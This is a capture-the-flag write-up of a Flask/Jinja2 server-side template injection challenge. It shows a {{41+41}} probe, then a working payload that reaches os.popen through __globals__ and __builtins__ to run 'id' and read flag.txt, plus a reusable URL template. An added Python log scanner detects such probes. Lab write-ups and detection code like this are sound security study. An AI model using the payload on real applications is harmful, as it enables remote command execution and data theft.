Challenge Description
Can you exploit this simple mistake?
SOLUTION
Click on the Start Instance button to start the challenge. Then you are provided with a web address in the form of <ip>:<port>. Copy it and open it in another tab or browser. In my case it was http://46.101.92.17:31311
Homepage of the Webapp:
The webapp shows the message:
Site still under construction
Proudly powered by Flask/Jinja2
Here we can see that it says that it is made with Flask/Jinja2.
Searching exploits for Flask/Jinja2:
I started searching for exploits for Flask/Jinja2. Then I came across
It talks about the SSTI exploit.
Test Exploit:
After modifying the provided URL to http://46.101.92.17:31311/{{41+41}}, I noticed that the returned result evaluates the value.
Then I came across:
Creating the exploit:
I have manipulated
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
step by step.
EXPLOIT Code:
http://46.101.92.17:31311/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}
Format:
http://<Web app address>/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}
This is how I got the flag.
Just replace <Web app address> with the web address that you are provided. In my case it was http://46.101.92.17:31311
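As an added example that is not part of the original writeup, here is a defender-side detection script in Python that scans web-server access-log lines for the kind of template-delimiter probes shown above (the `{{41+41}}` test and the `__globals__`-style payload). It URL-decodes the request path first, because a browser sends braces as `%7B`/`%7D`, and it rates a hit higher when the decoded path also contains attribute names that only appear in sandbox-escape payloads. The log lines, client addresses and timestamps are constructed for this example; the log format regex assumes the common/combined log format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). The requests
# mirror the probe and payload patterns discussed in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /%7B%7B41+41%7D%7D HTTP/1.1" 200 87 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /{{request.application.__globals__}} HTTP/1.1" 200 301 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /about HTTP/1.1" 404 153 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:02:00 +0000] "GET /search?q=%7B%25+if+1+%25%7D HTTP/1.1" 200 210 "-" "python-requests/2.31"
"""

# Common log format: client, ident, user, [timestamp], "METHOD PATH PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Jinja2 delimiters: expression {{ }}, statement {% %}, comment {# #}.
TEMPLATE_DELIMS = re.compile(r'\{\{|\}\}|\{%|%\}|\{#|#\}')

# Names that show up in sandbox-escape payloads and never in normal paths;
# their presence raises the finding from medium to high.
ESCAPE_MARKERS = ("__globals__", "__builtins__", "__class__", "__import__", "popen")


def decode_path(path: str) -> str:
    """URL-decode twice so double-encoded braces (%257B) are caught as well."""
    return unquote(unquote(path))


def scan_line(line: str):
    """Return a finding dict if the request path contains template syntax, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a parseable log line
    decoded = decode_path(m.group("path"))
    if not TEMPLATE_DELIMS.search(decoded):
        return None
    severity = "high" if any(tok in decoded for tok in ESCAPE_MARKERS) else "medium"
    return {
        "client": m.group("client"),
        "timestamp": m.group("ts"),
        "path": decoded,
        "status": int(m.group("status")),
        "severity": severity,
    }


def scan_log(text: str):
    """Scan every non-empty line and return the findings in log order."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        finding = scan_line(line)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['client']} {f['timestamp']} {f['path']} -> {f['status']}")
```

A 200 status on a flagged request is the signal worth paging on: the probe was not rejected, so the path is very likely being rendered as a template. The longer-term fix on the application side is to never concatenate request data into the template source and to pass it as a render context variable instead.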
This is how I solved this challenge.
Thank you for reading my writeup :)
Hope I will see you in my next writeup.
Support Me if you want to.